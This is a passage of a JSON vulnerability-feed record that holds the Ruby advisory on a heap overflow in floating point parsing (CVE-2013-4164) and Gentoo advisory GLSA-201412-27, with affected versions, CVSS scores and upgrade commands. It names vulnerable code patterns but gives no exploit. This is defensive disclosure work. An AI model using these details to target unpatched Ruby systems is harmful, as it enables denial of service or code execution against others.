lead to a denial of service attack via segmentation faults and possibly arbitrary code execution. Any program that converts input of unknown origin to floating point values (especially common when accepting JSON) are vulnerable.\n\nVulnerable code looks something like this:\n\n`untrusted_data.to_f`\n\nBut any code that produces floating point values from external data is vulnerable, such as this:\n\n`JSON.parse untrusted_data`\n\nNote that this bug is similar to CVE-2009-0689.\n\nAll users running an affected release should upgrade to the FIXED versions of Ruby.\n\n#Affected versions\n- All Ruby 1.8 versions\n- All Ruby 1.9 versions prior to Ruby 1.9.3 patchlevel 484\n- All Ruby 2.0 versions prior to Ruby 2.0.0 patchlevel 353\n- All Ruby 2.1 versions prior to Ruby 2.1.0 preview2\n- prior to trunk revision 43780\n\n#Solutions\nAll users are recommended to upgrade to Ruby 1.9.3 patchlevel 484, Ruby 2.0.0 patchlevel 353 or Ruby 2.1.0 preview2.\n\nPlease note that Ruby 1.8 series or any earlier releases are already obsoleted. There is no plan to release new FIXED versions for them. Users of such versions are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.\n", "modified": "2013-11-22T00:00:00", "published": "2013-11-22T00:00:00", "id": "H1:499", "href": "https://hackerone.com/reports/499", "type": "hackerone", "title": "Ruby: Ruby: Heap Overflow in Floating Point Parsing", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4481", "CVE-2012-5371", "CVE-2011-0188", "CVE-2013-0269", "CVE-2014-8090", "CVE-2013-1821", "CVE-2011-1005", "CVE-2014-8080", "CVE-2011-1004", "CVE-2013-4164", "CVE-2011-4815"], "description": "### Background\n\nRuby is an object-oriented scripting language.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Ruby. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Ruby 1.9 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-1.9.3_p551\"\n \n\nAll Ruby 2.0 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-2.0.0_p598\"", "edition": 1, "modified": "2014-12-13T00:00:00", "published": "2014-12-13T00:00:00", "id": "GLSA-201412-27", "href": "https://security.gentoo.org/glsa/201412-27", "type": "gentoo", "title": "Ruby: Denial of Service", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}